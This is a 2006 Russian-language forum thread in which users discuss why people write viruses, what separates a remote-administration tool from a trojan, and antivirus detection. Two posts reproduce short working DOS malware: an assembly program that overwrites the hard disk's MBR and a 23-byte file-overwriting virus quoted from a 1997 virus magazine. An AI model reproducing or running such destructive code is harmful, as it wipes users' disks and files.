Текущий архив: 2006.02.26;
Скачать: CL | DM;
Вниз
Сижу, антивирусник обновляю Найти похожие ветки
← →
Nic © (2006-02-03 23:36) [0]и думаю, нафиг пишут вирусы? Понять никак не могу, это приносит моральное statisfaction чтоли? Потенциал вирусописателей да в конструктивное русло бы.
← →
БарЛог © (2006-02-03 23:48) [1]До конструктивного русла еще дорасти надо.
Я вот например писАл, признаюсь, но довольно давно. Тестировал на друге :)
Никакого вреда - типа печать на его принтере, мигание клавой и т.п.
ПисАл, еще помнится, на VB3.0 :)
Вирусы, ИМХО, пишутся еще и потому, что идеи нет, т.е. думаешь "чего бы написАть?", "ды все уже написано". А вирусы писАть можно безгранично, тем более, что написание вируса может охватить почти любой раздел программирования. ИМХО.
← →
kaZaNoVa © (2006-02-03 23:52) [2]а нафиг пьют, убивают? ... просто люди несовершенны ....
← →
Nic © (2006-02-03 23:54) [3]
> kaZaNoVa ©
А это я понимаю ещё меньше, нежели создание вирусов. :(
← →
ivane (2006-02-03 23:55) [4]Раньше... написание вирусов действительно было удовлетворением моральных нужд.. сейчас же вирусы пишут с одной из двух целей:
1) Завалить сервер(этого могут желать конкуренты этого сервера)
2) Получить адреса Е-мейл.
Сами понимаете 2ое несет за собой очень хорошую прибыль. По неофициальной информации, за 1 почтовый ящик дают 5 центов. Соответственно пополнил спамерам базу на 20 ящиков - получил доллар. :-) А вирусы просто могут качевать от ящика к ящику и передавать хозяину адреса.... далее они продаются и вирусописатель качует на курорты... :-)
← →
kaZaNoVa © (2006-02-03 23:59) [5]ivane (03.02.06 23:55) [4]
сейчас же вирусы пишут с одной из двух целей:
не всегда...
любой троян пишется с целью скрытого добывания ценной информации - а тут вам и слежение за подружкой и промышленный/комерческий шпионаж ..
← →
Eraser © (2006-02-04 00:01) [6]кстати немного оффтопный вопрос!
чем программа для удалённого администрирования (RAT) должна отличаться от трояна, чтобы её не повносили в антивирусные базы?
← →
БарЛог © (2006-02-04 00:03) [7]Eraser © (04.02.06 00:01) [6]
Серверная часть должна висеть в трее, а не быть максимально скрытой, ИМХО.
← →
ivane (2006-02-04 00:04) [8]Тем не менее RemouteAdministrator NODом и Каспом детектится, как троян.
← →
ivane (2006-02-04 00:05) [9]2 kaZaNoVa впринципе это можно добавить в первую группу
← →
Eraser © (2006-02-04 00:11) [10]
> ivane (04.02.06 00:04) [8]
> Тем не менее RemouteAdministrator NODом и Каспом детектится,
> как троян.
не правда!
> БарЛог © (04.02.06 00:03) [7]
у радмина это можно отключить.
← →
Andy BitOff © (2006-02-04 00:13) [11]Удалено модератором
← →
Eraser © (2006-02-04 00:17) [12]
> Andy BitOff © (04.02.06 00:13) [11]
Из "энциклопедии вирусов" цитата ? ;-)
← →
Gero © (2006-02-04 00:20) [13]> пьют, убивают
Едят, воруют.
← →
Andy BitOff © (2006-02-04 00:24) [14]Eraser © (04.02.06 00:17) [12]
Не совсем. Мной взято из текстовика, лежащего у меня, а у меня он появился после дискуссий с Broken Sword"ом (может кто и знает) еще до того как он пришел на wasm.ru Правда не знаю, там он еще или нет.
← →
Джо © (2006-02-04 00:26) [15]Скушно потомушта. А так: украл, выпил, в тюрьму — романтика... :)
← →
Eraser © (2006-02-04 00:29) [16]
> Andy BitOff © (04.02.06 00:24) [14]
просто на сколько я помню данный текст
> Был написан под пагубным влиянием пьяных
> споров с известным крекером и хакером SkullC0DEr"ом. Спор
> был выигран
> мной, как достойным представителем своего увлечения - вирмейкерства.
>
> Вот перед вами и есть решение небольшой проблемы, каковая
> стояла:
:-)
один-в-один там был... правда давненько я эту книжку читал... может что путаю.
← →
Andy BitOff © (2006-02-04 00:33) [17]Eraser © (04.02.06 00:29) [16]
Ну Broken Sword мне цитировал, наверное, может и от туда.
Да, несколько ошибся в описании того что он делает, но это потому, что торопился.
← →
Kerk © (2006-02-04 12:34) [18]Andy BitOff © (04.02.06 0:13) [11]
Заражает собой все *.com"ы находящиеся с ним в каталоге.
Он портит все файлы в каталоге. Написать такое - много ума не надо.
Nic © (03.02.06 23:36)
и думаю, нафиг пишут вирусы?
А ты попробуй :)
← →
Anatoly Podgoretsky © (2006-02-04 12:57) [19]Nic © (03.02.06 23:36)
Ты думаешь пишут, большинство конструируют с помощью спецтулза, или copy/pase, а то и проще - путем замены пары байт в готовом.
← →
Anatoly Podgoretsky © (2006-02-04 12:58) [20]kaZaNoVa © (03.02.06 23:59) [5]
Это не только неполное описание трояна, а даже и неправильное. Главное в трояне это конь.
← →
Anatoly Podgoretsky © (2006-02-04 12:59) [21]БарЛог © (04.02.06 00:03) [7]
И как минимум наличие явного инсталятора.
← →
Anatoly Podgoretsky © (2006-02-04 13:00) [22]Троян не отличается от любой другой программы, кроме коня. Поэтому их можно писать по сотне в день.
← →
Kerk © (2006-02-04 13:05) [23]Anatoly Podgoretsky © (04.02.06 12:58) [20]
Главное в трояне это конь.
Распечатал. Повесил на стенку за монитором. :)
Дзенская мысль.
← →
vrem (2006-02-04 13:11) [24]Мне тоже понравилось про коня.
>наличие явного инсталятора
"Бойтесь данайцев..."
:-)
← →
Anatoly Podgoretsky © (2006-02-04 13:15) [25]И еще троян становится трояном только после определения, а так как фирм много, то у одних он троян, а у других добропорядочная программа и из-за этого антивирсные фирмы часто ругаются друг с другом.
← →
kaZaNoVa © (2006-02-04 13:34) [26]а если программа просто скрыто работает и ничего не делает - то её считают трояном?
← →
Eraser © (2006-02-04 13:36) [27]
> kaZaNoVa © (04.02.06 13:34) [26]
> скрыто работает и ничего не делает
не совместимые понятия :)
← →
kaZaNoVa © (2006-02-04 13:40) [28]Eraser © (04.02.06 13:36) [27]
почему? .. если она просто висит в памяти ..:))
← →
Anatoly Podgoretsky © (2006-02-04 13:47) [29]kaZaNoVa © (04.02.06 13:40) [28]
Конь есть?
← →
Kerk © (2006-02-04 13:51) [30]Anatoly Podgoretsky © (04.02.06 13:15) [25]
И еще троян становится трояном только после определения
Это да. :)
Имел удовольствие наблюдать лицо админа одной организации, когда, свежеустановленный вместо Касперского, NAV поприбивал все кряки и кейгены на сервере с софтом. :)
← →
Lamer@fools.ua © (2006-02-04 13:52) [31]>>kaZaNoVa © (04.02.06 13:40) [28]
Ну как минимум она занимает память и использует ресурсы системы :-)
← →
Anatoly Podgoretsky © (2006-02-04 14:02) [32]Lamer@fools.ua © (04.02.06 13:52) [31]
Это не определение. Вот если она скажем будет воровать твои данные или тихо ждать часа Х - вот тогда это будет конь троянский, как это описано у Гомера в его ихвестном произведении.
← →
antonn © (2006-02-04 14:08) [33]если программа выполняет функции, которые выполнять "не должна" - это конь.
а если еще и что то вредное - Троянский.
:)
← →
kaZaNoVa © (2006-02-04 14:14) [34]Anatoly Podgoretsky © (04.02.06 13:47) [29]
неа
← →
Lamer@fools.ua © (2006-02-04 15:55) [35]>>Anatoly Podgoretsky © (04.02.06 14:02) [32]
Если уж совсем, как у Гомера, то надо чтобы программа ворота открывала потом, AFAIR :-))
← →
Andy BitOff © (2006-02-04 16:54) [36]Kerk © (04.02.06 12:34) [18]
Он портит все файлы в каталоге. Написать такое - много ума не надо.
То, что я ошибся в описании, я уже написал. А вот на то, что много ума здесь не надо, в этом ты ошибаешься.
← →
Kerk © (2006-02-04 16:59) [37]Andy BitOff © (04.02.06 16:54) [36]
А вот на то, что много ума здесь не надо, в этом ты ошибаешься.
Ну да. Кто-то ребусы решает, кто-то марки собирает - у каждого свой способ время убить.
← →
Kerk © (2006-02-04 17:13) [38]
.286
.model tiny
.code
org 100h
start:
mov dx,80h
xor cx,cx
xor ax,ax
inc ax
mov bx,100h
int 13h
ret
end start
Программа записывает себя в MBR
14 байт
Не вижу ничего умного в написании программ, которые не делают ничего кроме того, как что-то портят.
← →
kaZaNoVa © (2006-02-04 17:28) [39]Kerk © (04.02.06 17:13) [38]
а чем это чудо компилять?))
← →
Kerk © (2006-02-04 17:44) [40]kaZaNoVa © (04.02.06 17:28) [39]
tasm
в винде работать не должно
← →
Andy BitOff © (2006-02-04 17:50) [41]Kerk © (04.02.06 17:13) [38]
Не надо сравнивать вызов одной функции с нужным параметром и то, что делается в приведенном мной коде. Ты хоть попробовал разобраться как он работает?
← →
Kerk © (2006-02-04 18:01) [42]Andy BitOff © (04.02.06 17:50) [41]
Не надо сравнивать вызов одной функции с нужным параметром и то, что делается в приведенном мной коде.
Почему не надо? Суть одна - порча информации и больше ничего. Ну если хочешь могу все винты в системе циклом похерить.
> Ты хоть попробовал разобраться как он работает?
Я этот баян еще во времена, когда собственно сам Infected Voice выходил читал.
← →
Kerk © (2006-02-04 18:12) [43]Раскопал тот номер журнала
Оттуда же:; [S]1997 SkullC0DEr [TRiAD]
;
; Самый маленький оверрайтер (меньше, imho, уже некуда Ж:)
; Размер: 23 байта
; Инфицирование: *.*
; Стабильность: зависит от состояния регистров при запуске
; Требования к CPU: 8086
; Замечания: может не пойти под некоторыми версиями дос
CSEG SEGMENT
ORG 100H
ASSUME CS:CSEG,DS:CSEG,ES:CSEG,SS:CSEG
START:
SUB CH,BYTE PTR DS:[2AH]
MOV AH,4EH
ST_1:
MOV DX,SI
INT 21H
MOV AH,3CH
MOV DX,9EH
INT 21H
XCHG BX,AX
MOV AH,40H
JNC ST_1
RETN
CSEG ENDS
END START
Убираем RETN (а зачем нам корректно завершаться?) и получаем те же 22 байта.
← →
Anatoly Podgoretsky © (2006-02-04 19:24) [44]Lamer@fools.ua © (04.02.06 15:55) [35]
Там не ворота главное было. А подлым троянцам подлянку подстроить.
← →
Kerk © (2006-02-04 21:48) [45]Nic © (03.02.06 23:36)
statisfaction
Тоже клип satisfaction нравится, да? :)))
← →
kaZaNoVa © (2006-02-04 21:49) [46]Kerk © (04.02.06 21:48) [45]
а ссылка на клип есть?))
← →
antonn © (2006-02-05 07:25) [47]а чего там хорошего, потные девки, фу...
:)
← →
kaZaNoVa © (2006-02-05 08:36) [48]antonn © (05.02.06 7:25) [47]
:nerv:
← →
Kerk © (2006-02-05 12:37) [49]antonn © (05.02.06 7:25) [47]
Зато какие!!! :)
Страницы: 1 2 вся ветка
Текущий архив: 2006.02.26;
Скачать: CL | DM;
Память: 0.59 MB
Время: 0.062 c
